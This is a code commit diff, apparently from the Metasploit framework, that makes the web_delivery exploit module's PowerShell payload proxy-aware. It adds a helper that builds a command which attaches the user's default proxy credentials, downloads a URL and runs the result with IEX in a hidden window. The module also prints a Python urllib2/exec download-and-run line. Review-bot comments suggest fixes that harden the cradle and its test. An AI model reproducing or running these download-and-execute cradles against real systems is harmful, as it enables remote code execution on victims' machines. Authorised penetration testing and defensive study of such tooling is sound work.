Make web_delivery proxy aware
parent
44fa188e71
commit
66c9222968
|
@ -72,6 +72,22 @@ module Powershell
|
||||||
def self.ignore_ssl_certificate
|
def self.ignore_ssl_certificate
|
||||||
'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
|
'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Use the default system web proxy and credentials to download a URL
|
||||||
|
# as a string and execute the contents as PowerShell
|
||||||
|
#
|
||||||
|
# @param url [String] string to download
|
||||||
|
#
|
||||||
|
# @return [String] PowerShell code to download a URL
|
||||||
|
def self.proxy_aware_download_and_exec_string(url)
|
||||||
|
var = Rex::Text.rand_text_alpha(1)
|
||||||
|
cmd = "$#{var}=new-object net.webclient;"
|
||||||
|
cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
|
||||||
|
cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
|
||||||
|
cmd << "IEX $#{var}.downloadstring('#{url}');"
|
||||||
|
cmd
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
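Review bot: `url` is interpolated into a single-quoted PowerShell literal in `cmd << "IEX $#{var}.downloadstring('#{url}');"` without escaping, so a URL containing `'` yields a command that no longer parses. Doubling the quote before interpolation, e.g. `safe_url = url.gsub("'", "''")`, keeps the literal intact. The doc comment also understates the behaviour: `@param url [String] string to download` and `@return [String] PowerShell code to download a URL` do not mention that the response body is passed to `IEX`, or that the current user's default credentials are attached to the system proxy (so an authenticating proxy would presumably log the request under that user). I would reword them to `# @param url [String] URL whose response body is downloaded and executed` and `# @return [String] PowerShell that fetches the URL via the system proxy with default credentials and runs it with IEX`.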
|
||||||
|
|
|
@ -89,7 +89,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
|
print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
|
||||||
when 'PSH'
|
when 'PSH'
|
||||||
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
|
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
|
||||||
download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{url}'))"
|
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
|
||||||
|
download_and_run = "#{ignore_cert}#{download_string}"
|
||||||
print_line generate_psh_command_line(
|
print_line generate_psh_command_line(
|
||||||
noprofile: true,
|
noprofile: true,
|
||||||
windowstyle: 'hidden',
|
windowstyle: 'hidden',
|
||||||
|
|
|
@ -40,5 +40,14 @@ describe Rex::Powershell::PshMethods do
|
||||||
script.include?('Get-QADComputer').should be_truthy
|
script.include?('Get-QADComputer').should be_truthy
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
describe "::proxy_aware_download_and_exec_string" do
|
||||||
|
it 'should return some powershell' do
|
||||||
|
url = 'http://blah'
|
||||||
|
script = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
|
||||||
|
script.should be
|
||||||
|
script.include?(url).should be_truthy
|
||||||
|
script.downcase.include?('downloadstring').should be_truthy
|
||||||
|
end
|
||||||
|
end
|
||||||
end
|
end
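Review bot: The new example never checks the proxy handling that this method exists for. It asserts only that the URL and `downloadstring` appear, which the previous non-proxy one-liner in the module would satisfy just as well. Adding `script.include?('GetSystemWebProxy').should be_truthy` and `script.include?('DefaultCredentials').should be_truthy` would pin the behaviour the commit introduces. `script.should be` can then be dropped, since the `include?` checks already fail on a nil result.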
|
||||||
|
|
||||||
|
|